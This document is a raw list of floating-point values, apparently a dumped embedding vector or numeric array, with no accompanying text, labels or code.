0.0021947843488305807, -0.017718292772769928, 0.004345927853137255, -0.008364547044038773, 0.0025257295928895473, 0.005273301154375076, -0.023464372381567955, 0.012765025720000267, -0.0006573442951776087, -0.0024038981646299362, 0.01163035724312067, -0.008451828733086586, -0.01208131480962038, 0.012197691947221756, 0.0125686414539814, -0.033254530280828476, -0.01866384968161583, -0.020787717774510384, 0.02224242128431797, 0.00882277823984623, 0.017107317224144936, -0.001161035499535501, 0.013783318921923637, 0.014423388056457043, -0.006171580869704485, -0.037735018879175186, 0.029181359335780144, 0.008968248963356018, -0.00848819687962532, -0.027799390256404877, -0.026766549795866013, -0.003727678442373872, 0.019522124901413918, 0.01626358926296234, -0.007208057213574648, -0.00596428569406271, -0.014503397047519684, -0.003278538817539811, -0.02164599299430847, -0.02198057435452938, 0.022329702973365784, -0.008604573085904121, -0.02352256141602993, -0.006582534871995449, 0.015710800886154175, 0.005887913517653942, 0.01828562654554844, -0.03235261142253876, -0.02273702062666416, -0.02340618520975113, 0.032498084008693695, -0.010226568207144737, 0.00041254490497522056, -0.014699782244861126, -0.00493144616484642, 0.007142595946788788, -0.0005214203847572207, 0.027333885431289673, 0.015419860370457172, 0.0074626305140554905, -0.020118553191423416, -0.010808449238538742, 0.011564895510673523, 0.002903952496126294, 0.013106881640851498, 0.01584172435104847, -0.022067856043577194, -0.012735932134091854, 0.04218640923500061, 0.008895513601601124, 0.007746297866106033, 0.025602787733078003, -0.009397386573255062, -0.007440810091793537, -0.027901219204068184, -0.0028639482334256172, -0.010466594249010086, 0.02641742117702961, -0.0014356108149513602, -0.015623519197106361, 0.011063022539019585, -0.002989416243508458, 0.011281227692961693, -0.002936683362349868, -0.0021293226163834333, -0.00848819687962532, 0.03857874497771263, -0.03668763116002083, -0.022416986525058746, -0.012357708998024464, -0.002853037789463997, 0.02867221273481846, -0.011033928021788597, -0.02909407578408718, 0.010808449238538742, 0.00493871932849288, 0.0053642201237380505, -0.043001044541597366, -0.0029839612543582916, -0.006858928594738245, -0.0043168338015675545, -0.0036185758654028177, -0.018111063167452812, -0.012415897101163864, 0.011266681365668774, 0.0017192780505865812, 0.016889112070202827, -0.01633632369339466, 0.022271515801548958, 0.018489286303520203, -0.0042295511811971664, -0.033021777868270874, 0.008735496550798416, 0.02404625341296196, -0.013877874240279198, -0.006502525880932808, 0.012503179721534252, -0.049430835992097855, 0.01155034825205803, -0.0023184341844171286, 0.003971341531723738, 0.005487869959324598, 0.001303778262808919, -0.010983013547956944, 0.006924390327185392, 0.02310069650411606, 0.0030094184912741184, 0.024788152426481247, 0.008539111353456974, 0.007986323907971382, -0.0133396340534091, -0.004876894410699606, -0.027202961966395378, 0.023435277864336967, -0.0038695121183991432, -0.029705051332712173, 0.00602247379720211, -0.02160235121846199, -0.008357273414731026, -0.019813066348433495, 0.0018029235070571303, -0.036978572607040405, 0.0070153092965483665, 0.014939808286726475, -0.004884168040007353, 0.01413244754076004, 0.014387020841240883, 0.00784812681376934, -0.02152961678802967, 0.012837761081755161, -0.008022691123187542, 0.02250426821410656, -0.0016301774885505438, -0.013739677146077156, 0.04317560791969299, 0.020191289484500885, -0.021500522270798683, -0.020642247051000595, 0.019289372488856316, -0.012765025720000267, 0.004811432678252459, -0.01949303038418293, 0.005527874454855919, -0.0010501142824068666, -0.012481358833611012, -0.0024420840200036764, -0.011048475280404091, 0.025079093873500824, -0.021776916459202766, -0.003594936802983284, 0.0015201654750853777, -0.02867221273481846, -0.01544895488768816, 0.009710147976875305, -0.007455356884747744, 0.02446811832487583, -0.01484525203704834, 0.008080880157649517, 0.006975304801017046, -0.043670207262039185, 0.016583623364567757, -0.03360365703701973, -0.012677744030952454, 0.015754442662000656, 0.0202785711735487, -0.0018156522419303656, -0.04241916164755821, -0.008095426484942436, 0.034941986203193665, 0.05056550353765488, 0.027333885431289673, -0.012590461410582066, -0.029908711090683937, 0.01892569661140442, -0.008699128404259682, -0.031625259667634964, 0.005124194081872702, -0.015274389646947384, -0.003482197178527713, -0.030985191464424133, 0.05376585200428963, 0.0031312499195337296, -0.009390112943947315, 0.0004964176914654672, 0.024337194859981537, -0.0025384582113474607, 0.002100228564813733, -0.03872421383857727, -0.00245481263846159, -0.04061533138155937, -0.008670034818351269, 0.037880487740039825, -0.00020309029787313193, 0.07331707328557968, -0.016118118539452553, -0.00882277823984623, 0.0035076546482741833, 0.0035222016740590334, 0.0029548672027885914, -0.007629921659827232, -0.030606968328356743, 0.015681706368923187, -0.008415461517870426, 0.02366803027689457, 0.0031930748373270035, -0.007826306857168674, 0.003482197178527713, -0.0006005199393257499, 0.01678728125989437, -0.017398256808519363, -0.02630104497075081, 0.008590025827288628, -0.004375021904706955, -0.0258500874042511, 0.0034094620496034622, 0.01982761360704899, 0.03692038357257843, 0.016990941017866135, -0.019434843212366104, 0.03753135725855827, 0.010502961464226246, -0.005404224619269371, 0.003202166873961687, -0.01626358926296234, -0.026635626330971718, -0.03898606076836586, -0.013005051761865616, -0.033138152211904526, -0.0001588809391250834, 0.005866093095391989, -0.025981010869145393, -0.022402439266443253, -0.005800631362944841, 0.04023710638284683, 0.01569625362753868, 0.01552168931812048, -0.029632316902279854, -0.02148597501218319, 0.002031130250543356, -0.005986106116324663, -0.013652395457029343, -0.015739895403385162, -0.037385888397693634, -0.02020583674311638, 0.0033076328691095114, -0.0021856925450265408, 0.03706585243344307, 0.02999599277973175, 0.00046641440712846816, 0.044048432260751724, 0.003956794273108244, -0.02152961678802967, -0.016161760315299034, 0.0038986061699688435, 0.005196929443627596, -0.03523292765021324, 0.013172343373298645, -0.007993597537279129, -0.0015892639057710767, -0.04110993072390556, 0.006404333747923374, -0.00015058457211125642, 0.0025657338555902243, -0.023580748587846756, -0.02404625341296196, 0.015463501214981079, 0.020336760208010674, -0.014154268428683281, 0.03014146350324154, 0.03424372896552086, 0.013143248856067657, -0.02558824047446251, -0.008226349949836731, -0.026999302208423615, -0.039829790592193604, -0.0507400706410408, 0.020904093980789185, -0.027086585760116577, -0.025340940803289413, 0.006848018150776625, 0.015943553298711777, 0.0011064840946346521, 0.0077826655469834805, -0.003913153428584337, -0.008531837724149227, -0.0017729202518239617, 0.012786846607923508, -0.014888893812894821, -0.01539076678454876, -0.03630940616130829, -0.02043858915567398, 0.014816158451139927, -0.002680291887372732, 0.028352176770567894, -0.01716550439596176, 0.030025087296962738, -0.028803136199712753, 0.01923118531703949, 0.006938937120139599, 0.03424372896552086, 0.0015028908383101225, 0.009870165027678013, -0.004295012913644314, 0.018154703080654144, 0.016583623364567757, -0.01911480911076069, -0.011448519304394722, 0.013805138878524303, 0.003709494834765792, -0.021020470187067986, 0.009659233503043652, -0.020831359550356865, -0.010452046990394592, 0.01854747347533703, 0.04355383291840553, 0.01942029595375061, -0.023653484880924225, -0.03145069628953934, -0.015536236576735973, -0.009295557625591755, 0.010786629281938076, 0.01569625362753868, 0.003556750947609544, 0.0060515678487718105, 0.008924608118832111, 0.013892421498894691, 0.026431968435645103, -0.0010119283106178045, -0.007717203814536333, -0.0018065603217110038, -0.005142378155142069, -0.020191289484500885, 0.010444773361086845, -0.005531511269509792, -0.027072038501501083, -0.03473832830786705, 0.0057278964668512344, -0.03232352063059807, -0.033021777868270874, -0.020293118432164192, -0.006684363819658756, 0.016539981588721275, -0.01603083685040474, 0.000016123914974741638, 0.006400696933269501, 0.03424372896552086, -0.009731968864798546, 0.0022366070188581944, 0.013441463001072407, 0.007600827608257532, 0.009491942822933197, 0.009630138985812664, -0.0261992160230875, -0.018954791128635406, -0.0043822950683534145, -0.014896167442202568, -0.0202785711735487, 0.034534670412540436, -0.023682577535510063, -0.0038695121183991432, -0.013826959766447544, -0.008662761189043522, 0.010284756310284138, 0.015099825337529182, -0.025079093873500824, -0.02224242128431797, 0.016249042004346848, -0.002927591325715184, -0.017980139702558517, -0.010306576266884804, 0.011223039589822292, 0.04399024322628975, 0.02321707271039486, -0.040324389934539795, -0.006146123632788658, -0.006226132158190012, 0.02397351898252964, 0.01949303038418293, 0.009928353130817413, 0.0013201436959207058, 0.020104005932807922, 0.020365852862596512, 0.0034003702457994223, -0.0005414225743152201, -0.003033057553693652, 0.009761062450706959, 0.0014465211424976587, -0.013856054283678532, -0.031596165150403976, 0.021442335098981857, 0.011121210642158985, 0.01588536612689495, 0.0068734753876924515, 0.005487869959324598, -0.016903657466173172, 0.019696690142154694, 0.005233297124505043, -0.023537108674645424, -0.024293553084135056, -0.0012601371854543686, 0.006986215244978666, -0.03284721076488495, -0.009826524183154106, 0.006397060118615627, 0.012975958175957203, 0.013819686137139797, -0.002062042709439993, 0.02344982512295246, -0.000047561996325384825, -0.008437282405793667, -0.025617334991693497, -0.0017874672776088119, -0.00814634095877409, -0.03127613291144371, 0.011070296168327332, -0.0013928789412602782, -0.029603222385048866, 0.032992683351039886, -0.004855073988437653, -0.014910713769495487, 0.006895296275615692, 0.003804050385951996, -0.03014146350324154, 0.04643414542078972, -0.0007409897516481578, -0.0125686414539814, 0.0050223651342093945, -0.011492160148918629, -0.004225914366543293, 0.012954137288033962, -0.023362543433904648, -0.0021820557303726673, 0.0009910169756039977, 0.0006259772344492376, 0.01994398981332779, -0.00493871932849288, -0.04602682963013649, -0.004207730758935213, 0.01892569661140442, 0.007182599976658821, 0.032381705939769745, -0.010212020948529243, 0.00936829298734665, -0.026970209553837776, 0.006440700963139534, 0.0021111390087753534, 0.0405571423470974, -0.02129686437547207, 0.01629268191754818, 0.0021275044418871403, -0.003158525563776493, -0.0042731924913823605, 0.01847473904490471, 0.011557621881365776, 0.016001742333173752, -0.011099389754235744, 0.017732840031385422, -0.012823213823139668, 0.017441898584365845, -0.026635626330971718, -0.02046768181025982, -0.004153179470449686, 0.0005396042251959443, 0.02634468674659729, 0.0063825128600001335, 0.014823432080447674, 0.03354547172784805, 0.014568858779966831, -0.006582534871995449, -0.016990941017866135, -0.01324507873505354, 0.008349999785423279, -0.011935845017433167, 0.04358292743563652, 0.006749825552105904, -0.008895513601601124, 0.0044441199861466885, -0.0037349520716816187, 0.001344691845588386, 0.0029094077181071043, -0.00008517973037669435, -0.04026620090007782, -0.040440768003463745, 0.02103501744568348, -0.01172491256147623, -0.027610277757048607, -0.006575261242687702, 0.0141688147559762, 0.00029412293224595487, 0.002260246081277728, -0.032759930938482285, -0.019900348037481308, -0.008313632570207119, 0.016918204724788666, -0.018809320405125618, -0.00096555968048051, 0.008597299456596375, 0.02408989518880844, 0.016190852969884872, 0.026359234005212784, 0.050070904195308685, 0.02675200253725052, 0.011841288767755032, 0.0068625654093921185, -0.018169250339269638, 0.03360365703701973, -0.02646106295287609, 0.022446079179644585, -0.0010755716357380152, 0.010772082023322582, -0.001563806552439928, 0.010757534764707088, 0.03127613291144371, 0.028584929183125496, 0.02430810034275055, 0.012074042111635208, -0.028744947165250778, 0.019405748695135117, -0.015027090907096863, 0.02246062643826008, -0.005142378155142069, -0.02615557424724102, 0.01552168931812048, 0.020045818760991096, 0.02919590473175049, -0.004404115956276655, 0.02878858894109726, 0.024293553084135056, -0.015259843319654465, 0.008895513601601124, -0.004124085418879986, 0.0017556456150487065, 0.011106663383543491, 0.0012355890357866883, -0.02627195045351982, 0.014401568099856377, 0.03241080045700073, -0.006240679416805506, -0.055191464722156525, -0.011521254666149616, -0.008953701704740524, 0.002889405470341444, 0.006295230705291033, 0.004313196986913681, 0.022038763388991356, 0.01953667216002941, 0.00006551849946845323, -0.0032621733844280243, 0.002607556525617838, 0.029821427538990974, -0.011834015138447285, 0.0012819577241316438, 0.009237369522452354, 0.028177613392472267, 0.017980139702558517, 0.025006359443068504, -0.0218205563724041, 0.026126479730010033, 0.013914242386817932, -0.03165435418486595, 0.0023511650506407022, 0.004575043451040983, 0.03305087238550186, -0.02032221294939518, -0.02013310045003891, -0.01539076678454876, -0.026475610211491585, -0.00769538339227438, -0.0063825128600001335, -0.0049787238240242004, 0.013790592551231384, -0.008313632570207119, 0.0031385235488414764, -0.0024202633649110794, 0.02013310045003891, 0.006706184707581997, -0.043117422610521317, -0.0017674651462584734, 0.02698475494980812, -0.010830270126461983, 0.004902351647615433, -0.01565261371433735, -0.0003225351101718843, 0.003716768231242895, -0.003854965092614293, 0.011746733449399471, 0.007051676977425814, 0.022489720955491066, -0.03363275155425072, -0.004549586214125156, 0.019172996282577515, -0.018198344856500626, 0.01828562654554844, 0.01693275198340416, 0.00776084465906024, -0.016438152641057968, 0.007855400443077087, 0.022373344749212265, -0.019172996282577515, -0.023347996175289154, -0.013950609602034092, -0.0057933577336370945, -0.01828562654554844, 0.009986542165279388, 0.01163035724312067, -0.02152961678802967, -0.012597735039889812, -0.0028257621452212334, -0.00878641102463007, 0.005411498248577118, -0.010328397154808044, 0.012372256256639957, 0.009179181419312954, -0.018722038716077805, -0.0001371740218019113, -0.011906750500202179, -0.00029571400955319405, -0.006731641944497824, 0.017485540360212326, -0.00946284830570221, 0.01552168931812048, -0.01825653202831745, -0.02446811832487583, 0.00813179463148117, 0.0075790067203342915, -0.013405095785856247, 0.034156445413827896, 0.0038222342263907194, -0.01091027818620205, 0.014343379996716976, -0.004360474646091461, -0.0045314026065170765, -0.013092334382236004, -0.011048475280404091, 0.00424409843981266, -0.006960757542401552, 0.022227874025702477, 0.004738697782158852, 0.0031457969453185797, 0.008611846715211868, 0.013899695128202438, 0.017369164153933525, 0.008095426484942436, 0.02857038378715515, -0.020947735756635666, -0.017180051654577255, 0.01878022588789463, 0.018794773146510124, -0.02347891964018345, -0.007797212339937687, 0.012030400335788727, -0.030228745192289352, 0.03630940616130829, -0.00017024581029545516, -0.005295122042298317, 0.010822996497154236, -0.016394512727856636, -0.03729860484600067, 0.013208710588514805, -0.012103135697543621, -0.0009955628775060177, 0.019769424572587013, -0.012423170730471611, -0.010481140576303005, -0.006200674921274185, 0.010212020948529243, -0.012932317331433296, -0.021456880494952202, 0.031334321945905685, 0.006749825552105904, -0.004975087009370327, 0.019507577642798424, 0.02574825845658779, 0.030083274468779564, 0.009673780761659145, -0.015739895403385162, 0.021122299134731293, -0.012554094195365906, 0.016321776434779167, 0.005786084569990635, -0.012212238274514675, 0.006848018150776625, -0.021704180166125298, -0.01507073175162077, -0.01915844902396202, 0.013470557518303394, -0.003993161953985691, -0.01324507873505354, -0.024584494531154633, -0.011397604830563068, -0.010182926431298256, 0.029908711090683937, 0.02321707271039486, -0.04564860463142395, -0.026621079072356224, -0.0036731271538883448, 0.012575914151966572, 0.0141106266528368, -0.0015892639057710767, -0.02046768181025982, -0.031072473153471947, 0.02243153378367424, 0.0008610028307884932, 0.028759494423866272, -0.027348432689905167, -0.0023657120764255524, -0.019172996282577515, 0.0058915503323078156, 0.02404625341296196, 0.013623300939798355, -0.01483070570975542, -0.04131358861923218, 0.04169180989265442, -0.01870749145746231, 0.00388042232953012, -0.007477177772670984, 0.008117247372865677, -0.00027139318990521133, 0.019653048366308212, 0.011644904501736164, 0.004505944903939962, -0.011710365302860737, -0.013172343373298645, 0.011914024129509926, 0.02510818839073181, 0.0030076000839471817, 0.01272138487547636, 0.00957922451198101, 0.012001306749880314, 0.006262499839067459, -0.008291811682283878, -0.010473867878317833, 0.01454703789204359, -0.004142269026488066, 0.0013592388713732362, 0.005327852908521891, 0.021238675341010094, -0.020758623257279396, 0.0010073824087157845, -0.026621079072356224, -0.008575478568673134, -0.032236237078905106, 0.014045164920389652, 0.021282317116856575, -0.024075347930192947, -0.01591446064412594, 0.005476959981024265, 0.02919590473175049, -0.01240134984254837, -0.016947299242019653, 0.04785975441336632, -0.004004072397947311, -0.01337600126862526, -0.012852308340370655, -0.012321341782808304, -0.058770034462213516, -0.002500272123143077, -0.0044259363785386086, -0.02081681229174137, 0.012437717989087105, -0.03465104475617409, -0.010037456639111042, 0.010881184600293636, -0.010015635751187801, 0.014350653626024723, 0.0015119827585294843, 0.021427787840366364, 0.011026655323803425, 0.014823432080447674, -0.019594861194491386, 0.0024820882827043533, 0.028686759993433952, 0.002269337885081768, -0.014779791235923767, 0.015827177092432976, 0.013288719579577446, 0.008720949292182922, -0.011375783942639828, -0.002132959431037307, 0.031974390149116516, 0.007768118288367987, 0.002367530483752489, -0.019667595624923706, 0.02615557424724102, -0.006037021055817604, -0.03639668971300125, -0.0013365091290324926, -0.01309960801154375, 0.016045382246375084, -0.0008378184866160154, 0.012052221223711967, -0.008953701704740524, 0.018314721062779427, -0.01387060061097145, -0.018489286303520203, 0.015463501214981079, -0.022533362731337547, -0.00005588676503975876, -0.004458667244762182, 0.005593336187303066, 0.024977264925837517, 0.009593771770596504, 0.008175435476005077, 0.03470923379063606, 0.010073823854327202, 0.011681271716952324, -0.00461141113191843, -0.00462959473952651, 0.007862674072384834, -0.005986106116324663, -0.001671090954914689, 0.018241986632347107, -0.007862674072384834, 0.011593989096581936, 0.007284429389983416, -0.0020184016320854425, -0.01166672445833683, -0.025122735649347305, -0.014888893812894821, -0.010866637341678143, -0.002874858444556594, 0.029603222385048866, 0.008313632570207119, -0.0007137140491977334, 0.01806742139160633, 0.002943956758826971, -0.015041637234389782, 0.023609843105077744, -0.009528310038149357, -0.003396733431145549, -0.0025548236444592476, 0.0133978221565485, 0.007073497399687767, 0.022300610318779945, -0.0003186710528098047, -0.006400696933269501, 0.012888675555586815, 0.002911226125434041, -0.002505727345123887, -0.0011874019401147962, -0.011128484271466732, 0.017092769965529442, -0.016321776434779167, -0.001823834958486259, -0.01859111525118351, 0.010721167549490929, 0.01859111525118351, -0.02032221294939518, -0.019798519089818, 0.013899695128202438, 0.0009610137203708291, -0.010124738328158855, 0.018722038716077805, 0.0023966245353221893, -0.01633632369339466, -0.015201655216515064, 0.0025111825671046972, 0.01192857138812542, 0.024846341460943222, -0.005709712393581867, -0.0013892421266064048, -0.0056769815273582935, -0.0028112151194363832, 0.0015192562714219093, -0.006484342273324728, 0.0075062718242406845, 0.024075347930192947, -0.007906314916908741, 0.02024947665631771, 0.0195657666772604, -0.0026002831291407347, -0.0011701274197548628, -0.013732404448091984, 0.017252787947654724, -0.03593118488788605, 0.017936497926712036, 0.0013437826419249177, -0.00704804016277194, 0.01610357128083706, 0.002389351138845086, -0.013470557518303394, -0.0057278964668512344, -0.010226568207144737, -0.03127613291144371, 0.01937665417790413, 0.00024093531828839332, 0.014677961356937885, -0.0011710366234183311, 0.01063388492912054, -0.017776479944586754, -0.013506924733519554, 0.01636541821062565, 0.015638066455721855, 0.012903222814202309, -0.04076080024242401, -0.005829725414514542, 0.007211694028228521, 0.026097387075424194, 0.011754007078707218, -0.026126479730010033, -0.031101567670702934, 0.015259843319654465, -0.013005051761865616, -0.0126850176602602, -0.022707926109433174, 0.01087391097098589, 0.0004455030430108309, 0.011033928021788597, -0.008124521002173424, 0.006789830047637224, -0.022446079179644585, 0.017092769965529442, 0.003711313009262085, 0.00004222050483804196, 0.0048623476177453995, -0.0022438806481659412, -0.015492595732212067, -0.012830487452447414, -0.02129686437547207, -0.02973414584994316, 0.010059276595711708, -0.0007528092246502638, -0.00816816184669733, -0.010248388163745403, -0.009695600718259811, 0.004545949399471283, 0.03063606284558773, -0.002520274370908737, 0.019842160865664482, -0.010110192000865936, 0.0031076110899448395, -0.0018129246309399605, -0.0051932926289737225, 0.017587369307875633, 0.009550130926072598, 0.00014046984142623842, 0.019333014264702797, 0.0013656031806021929, 0.008800958283245564, 0.005847909487783909, -0.02976324036717415, -0.005884277168661356, -0.013368727639317513, 0.011186672374606133, 0.013994250446557999, 0.02302796207368374, -0.0027312063612043858, -0.02713022567331791, -0.01021929457783699, -0.011332143098115921, -0.0021038653794676065, 0.014481576159596443, 0.001752008916810155, 0.0002988961641676724, -0.015419860370457172, 0.001296504749916494, -0.005604246631264687, 0.010684799402952194, -0.02419172413647175, -0.013114155270159245, 0.002911226125434041, 0.005273301154375076, 0.017398256808519363, -0.010284756310284138, -0.012590461410582066, -0.01742735132575035, -0.020307665690779686, -0.028366724029183388, -0.018460191786289215, 0.022533362731337547, 0.007273518946021795, 0.010582970455288887, 0.008400914259254932, -0.0057388064451515675, -0.00703712971881032, -0.005600609816610813, -0.005204203072935343, 0.03741498291492462, 0.008335452526807785, -0.0010928462725132704, -0.024264460429549217, 0.01738371141254902, 0.00036867649760097265, 0.0017692835535854101, -0.003571297973394394, -0.009535583667457104, 0.012263152748346329, 0.005571515765041113, 0.006255226209759712, 0.01298323180526495, -0.014721602201461792, -0.001318325288593769, 0.007586280349642038, 0.0060515678487718105, 0.014277918264269829, -0.006626175716519356, 0.005949738435447216, -0.004145905841141939, -0.01987125352025032, 0.007571733556687832, 0.030083274468779564, 0.020802265033125877, 0.007444446906447411, 0.030316026881337166, 0.004145905841141939, 0.0029785060323774815, -0.0043822950683534145, -0.004473214037716389, -0.0022511540446430445, -0.011019381694495678, -0.02307160198688507, -0.012030400335788727, -0.002767574042081833, -0.0020129464101046324, 0.01780557446181774, -0.013317813165485859, -0.001902025192975998, 0.016583623364567757, -0.01828562654554844, 0.006775283254683018, 0.007306249812245369, 0.01878022588789463, 0.007022582460194826, -0.0060952091589570045, 0.005160561762750149, 0.0028875870630145073, -0.020351305603981018, 0.0009482850437052548, -0.013390548527240753, -0.012590461410582066, -0.003125794930383563, 0.023697124794125557, -0.0038876959588378668, 0.01377604529261589, 0.003800413804128766, -0.0003113975399173796, 0.0013928789412602782, 0.0016292682848870754, 0.005309668835252523, 0.0019456663867458701, 0.027799390256404877, 0.005106010474264622, 0.019522124901413918, 0.006451611407101154, 0.0019511214923113585, -0.026824738830327988, -0.0007382621988654137, 0.003402188653126359, 0.0021584169007837772, 0.005098736844956875, 0.01518710795789957, 0.009797430597245693, -0.010015635751187801, -0.00529875885695219, -0.02475905977189541, -0.0029948714654892683, -0.011935845017433167, -0.01994398981332779, 0.00010779582953546196, 0.004640505183488131, -0.013943335972726345, 0.018503831699490547, -0.010510235093533993, 0.013921515084803104, -0.0015919915167614818, -0.013332360424101353, -0.04308832809329033, -0.010081097483634949, 0.002698475494980812, -0.003916790243238211, -0.004982360638678074, -0.02302796207368374, 0.015318031422793865, 0.005807904992252588, 0.02841036580502987, -0.00493144616484642, 0.01475069671869278, 0.006797103676944971, 0.015085279010236263, -0.004065897315740585, -0.020045818760991096, 0.0022929769475013018, -0.035582054406404495, 0.012975958175957203, -0.01915844902396202, -0.01915844902396202, 0.0253700353205204, -0.01010291837155819, -0.011972212232649326, 0.00016945027164183557, -0.000839182292111218, 0.003053059568628669, 0.007309886626899242, -0.016234494745731354, -0.011681271716952324, 0.001482888706959784, 0.02006036601960659, -0.005186018999665976, -0.023580748587846756, -0.021835103631019592, -0.0013310540234670043, 0.03226533159613609, 0.009666507132351398, 0.04259372875094414, -0.015827177092432976, -0.00002621024032123387, -0.0010801175376400352, -0.0031621623784303665, -0.017543727532029152, -0.030606968328356743, -0.002316615777090192, 0.02641742117702961, 0.0436411127448082, -0.007477177772670984, -0.005531511269509792, -0.001115576014854014, -0.0028166703414171934, -0.02148597501218319, 0.014030618593096733, -0.0009055531118065119, 0.03307996317744255, -0.01475069671869278, 0.015434407629072666, -0.016627265140414238, 0.02280975505709648, -0.015303484164178371, 0.006498889531940222, -0.0013292356161400676, -0.017601916566491127, 0.013572386465966702, -0.0009637412731535733, -0.0019274825463071465, 0.019129354506731033, 0.010822996497154236, 0.0029221363365650177, 0.009528310038149357, 0.008080880157649517, -0.00016342688468284905, -0.007168053183704615, -0.01552168931812048, -0.028497647494077682, -0.012554094195365906, 0.019594861194491386, 0.03898606076836586, 0.011070296168327332, -0.00814634095877409, -0.013536019250750542, 0.002756663830950856, -0.0038440548814833164, -0.0010519326897338033, -0.014685234986245632, -0.01095391996204853, -0.0037222234532237053, 0.008510017767548561, -0.010299302637577057, 0.009448301047086716, 0.00594610208645463, 0.012932317331433296, 0.0009991996921598911, 0.0033785495907068253, -0.009040984325110912, 0.012103135697543621, -0.007804485969245434, -0.01365966908633709, 0.007400805596262217, 0.0009278282523155212, 0.006866202224045992, -0.004022256005555391, -0.009957447648048401, -0.0021147755905985832, -0.005855182651430368, 0.014372473582625389, -0.010881184600293636, -0.001628359081223607, 0.02755209058523178, -0.001020111027173698, 0.006695274263620377, -0.0010755716357380152, 0.027464808896183968, 0.01125213410705328, 0.014146994799375534, -0.04832525923848152, 0.0038731489330530167, -0.025486411526799202, -0.012859581969678402, 0.01629268191754818, -0.007877221331000328, -0.009273736737668514, -0.001480161095969379, 0.03799686208367348, -0.00597519613802433, -0.011266681365668774, -0.019405748695135117, 0.03721132501959801, 0.012321341782808304, -0.008706402033567429, 0.004778702277690172, 0.006120666395872831, -0.007182599976658821, 0.010073823854327202, -0.016569076105952263, -0.016452699899673462, 0.0054624127224087715, 0.008568205870687962, -0.0004252735816407949, 0.0011283046333119273, -0.013201436959207058, -0.018983885645866394, -0.029777787625789642, 0.004796885885298252, 0.01053932961076498, -0.0002686656080186367, -0.001647452125325799, 0.015099825337529182, 0.008982796221971512, -0.013114155270159245, -0.00776084465906024, 0.015274389646947384, -0.008946428075432777, -0.006655269768089056, -0.012634102255105972, 0.006247953046113253, -0.00981925055384636, -0.0038949695881456137, 0.02020583674311638, 0.0002177509741159156, 0.0013856054283678532, 0.0039967987686395645, -0.007455356884747744, 0.011579442769289017, 0.009135539643466473, 0.027261149138212204, 0.012939590029418468, 0.00038845138624310493, -0.010808449238538742, -0.007797212339937687, -0.0036385778803378344, -0.017703745514154434, -0.005378767382353544, -0.008029964752495289, 0.004945992957800627, -0.010939372703433037, -0.011201219633221626, 0.006724368315190077, 0.005582425743341446, -0.011775827035307884, 0.006582534871995449, -0.026999302208423615, -0.00910644605755806, 0.0010983013780787587, 0.0008505471632815897, 0.012997779063880444, -0.008357273414731026, 0.008037238381803036, -0.01236498262733221, -0.008044512011110783, -0.016583623364567757, -0.009775609709322453, 0.0134560102596879, -0.0011764917289838195, -0.009957447648048401, -0.02686837874352932, 0.013906968757510185, -0.013179617002606392, 0.029966898262500763, 0.010466594249010086, 0.007862674072384834, -0.008757317438721657, 0.0027712108567357063, -0.008720949292182922, 0.018532926216721535, -0.008037238381803036, -0.02641742117702961, 0.0014928898308426142, 0.016845470294356346, 0.015158013440668583, 0.013521471992135048, -0.003020328702405095, 0.003920426592230797, -0.006411606911569834, 0.011863109655678272, -0.003738588886335492, 0.003804050385951996, 0.007273518946021795, 0.019071167334914207, 0.032992683351039886, -0.010532055981457233, -0.023187978193163872, -0.015361672267317772, 0.016627265140414238, 0.00948466919362545, 0.02046768181025982, -0.01202312670648098, 0.010393858887255192, 0.003804050385951996, -0.010713893920183182, -0.013012325391173363, 0.009244643151760101, 0.007993597537279129, -0.00032435348839499056, -0.020307665690779686, -0.009651959873735905, -0.00006375693919835612, 0.008291811682283878, 0.016918204724788666, -0.036716725677251816, -0.0006255226326175034, 0.03203257918357849, 0.012270426377654076, -0.018154703080654144, 0.0058806403540074825, -0.0042295511811971664, 0.00036754002212546766, 0.0049787238240242004, -0.004305923357605934, -0.021005922928452492, -0.011652177199721336, 0.006386149674654007, 0.0044877612963318825, 0.005200566258281469, -0.0011219403240829706, 0.00709531782194972, -0.004029529634863138, -0.018867509439587593, 0.009251915849745274, -0.011150305159389973, 0.003927700221538544, -0.018009232357144356, -0.011208493262529373, 0.0374731719493866, -0.03526202216744423, -0.019318467006087303, -0.034825608134269714, 0.010939372703433037, 0.028497647494077682, -0.0023129789624363184, -0.004364111460745335, -0.029966898262500763, -0.009637412615120411, -0.02404625341296196, 0.010830270126461983, 0.012735932134091854, -0.009891985915601254, -0.01477251760661602, -0.014379747211933136, 0.011957664974033833, 0.01552168931812048, -0.006498889531940222, 0.0006191583233885467, 0.0329635888338089, -0.008604573085904121, -0.03758954629302025, 0.008990069851279259, -0.0212241280823946, -0.00461141113191843, 0.006047931034117937, 0.0043277437798678875, -0.010742987506091595, -0.00814634095877409, 0.021093204617500305, -0.026402873918414116, -0.013543292880058289, -0.009833797812461853, 0.021020470187067986, 0.0011564894812181592, 0.02555914595723152, -0.0033058144617825747, 0.02273702062666416, -0.016118118539452553, 0.011848562397062778, -0.006600718479603529, -0.014205182902514935, -0.011317595839500427, -0.018431097269058228, 0.008931881748139858, -0.000915554235689342, -0.004280466120690107, 0.011179398745298386, 0.019783971831202507, -0.014008797705173492, -0.0029094077181071043, -0.0038840591441839933, 0.0031367051415145397, -0.01565261371433735, 0.010124738328158855, 0.03718223050236702, -0.014699782244861126, -0.005789721384644508, 0.0007896313909441233, -0.009230095893144608, -0.0031567073892802, -0.013346907682716846, -0.018227439373731613, 0.007368074730038643, -0.011673998087644577, -0.02912317030131817, 0.0013165069976821542, 0.010379311628639698, -0.000689165957737714, -0.014437935315072536, -0.011579442769289017, 0.006346145179122686, 0.002776665845885873, -0.010379311628639698, 0.004516855347901583, 0.004607774317264557, 0.009382839314639568, -0.0008178162970580161, 0.01806742139160633, 0.006888022646307945, -0.006524346768856049, -0.009746515192091465, -0.011186672374606133, -0.011077569797635078, 0.021136846393346786, -0.0006473431712947786, -0.007437173277139664, -0.014503397047519684, -0.015929006040096283, -0.014408841729164124, 0.0005709712277166545, 0.01768919825553894, 0.014685234986245632, -0.02404625341296196, -0.006186128128319979, -0.002665744861587882, 0.011506707407534122, 0.007135322317481041, -0.020336760208010674, 0.01738371141254902, 0.020380400121212006, 0.001859293319284916, -0.008997343480587006, 0.006578898057341576, 0.0033840048126876354, 0.012714111246168613, 0.0006405242602340877, -0.02653379738330841, 0.041982751339673996, -0.03322543576359749, 0.01539076678454876, -0.0024857250973582268, 0.003462195163592696, 0.00872822292149067, 0.027479354292154312, 0.001785648986697197, -0.002443902427330613, 0.002023856621235609, -0.008313632570207119, 0.005807904992252588, 0.00784812681376934, -0.015638066455721855, -0.013237805105745792, 0.006520709954202175, -0.008982796221971512, 0.02129686437547207, 